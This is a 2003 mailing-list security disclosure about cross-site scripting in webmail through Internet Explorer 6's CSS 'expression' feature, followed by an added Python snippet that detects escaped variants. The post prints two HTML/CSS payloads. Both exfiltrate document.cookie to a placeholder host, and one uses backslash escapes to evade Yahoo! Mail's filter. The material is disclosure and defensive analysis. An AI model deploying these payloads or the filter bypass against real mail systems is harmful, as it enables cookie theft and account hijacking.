Full Disclosure mailing list archives
Webmails (including Yahoo) + IE 6 = XSS
From: Jedi/Sector One <j () pureftpd org>
Date: Mon, 29 Sep 2003 16:28:24 +0200
Internet Explorer has a useless feature that allows evaluation of Javascript
expressions in style sheets through the "expression" keyword. It allows
execution of arbitrary javascript as soon as an HTML message is read in older
versions of Outlook and in most webmail systems filtering <script> tags:

<html>
<body>
<style type="text/css">
h1 {
  height:expression(alert(42));
  background-image:expression('url(http://example.org/'+document.cookie+')');
}
</style>
<h1>...</h1>
</body>
</html>

Yahoo! mail has a filter against this, that replaces "expression" with
"_expression". Unfortunately, this filter is easy to bypass using escaped
characters that are valid CSS and that are properly handled by IE 6.

<html>
<body>
<style type="text/css">
h1 {
  he\ight:e\xpression(alert(42));
  bac\kground-image:e\xpression('url(http://example.org/'+document.cookie+')');
}
</style>
<h1>...</h1>
</body>
</html>

Workaround until all existing webmail software is fixed (...): disable
Javascript and/or use any other web browser that focuses on W3C compliance
instead of implementing insecure bloat.

--
 __  /*-     Frank DENIS (Jedi/Sector One) <j () 42-Networks Com>     -*\  __
 \ '/   <a href="http://www.PureFTPd.Org/"> Secure FTP Server </a>    \' /
  \/  <a href="http://www.Jedi.Claranet.Fr/"> Misc. free software </a>  \/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
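Added illustration, not part of the original post: a small Python check of why a literal substring replacement (the Yahoo! filter described above) misses the escaped form, and how decoding CSS backslash escapes before matching catches both variants. The function names and the sample style rules are my own, constructed for this demonstration.

```python
import re

# CSS escape: backslash + 1-6 hex digits (+ one optional whitespace),
# or backslash + any single non-newline character (e.g. "\x" -> "x").
_CSS_ESCAPE = re.compile(r'\\([0-9a-fA-F]{1,6})[ \t\n\f\r]?|\\([^\n\r\f0-9a-fA-F])')

# Constructed samples: the plain rule and the escaped rule from the post.
PLAIN_CSS = "h1 { height:expression(alert(42)); }"
ESCAPED_CSS = r"h1 { he\ight:e\xpression(alert(42)); }"
BENIGN_CSS = "h1 { height: 10px; background-image: url(logo.png); }"


def unescape_css(text: str) -> str:
    """Decode CSS backslash escapes so identifiers read as IE would see them."""
    def repl(m: re.Match) -> str:
        if m.group(1) is not None:          # hex escape, e.g. "\65 " -> "e"
            return chr(int(m.group(1), 16))
        return m.group(2)                   # simple escape, e.g. "\x" -> "x"
    return _CSS_ESCAPE.sub(repl, text)


def naive_filter(css: str) -> str:
    """Literal-substring approach the post describes: rename 'expression'."""
    return css.replace("expression", "_expression")


def contains_expression(css: str) -> bool:
    """Normalize escapes and strip comments, then look for an expression( token."""
    normalized = unescape_css(css)
    normalized = re.sub(r"/\*.*?\*/", "", normalized, flags=re.S)
    return re.search(r"expression\s*\(", normalized, re.I) is not None


if __name__ == "__main__":
    for label, css in (("plain", PLAIN_CSS), ("escaped", ESCAPED_CSS), ("benign", BENIGN_CSS)):
        print(f"{label:8} naive changed={naive_filter(css) != css}  "
              f"normalized match={contains_expression(css)}")
```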
Current thread:
- Webmails (including Yahoo) + IE 6 = XSS Jedi/Sector One (Sep 29)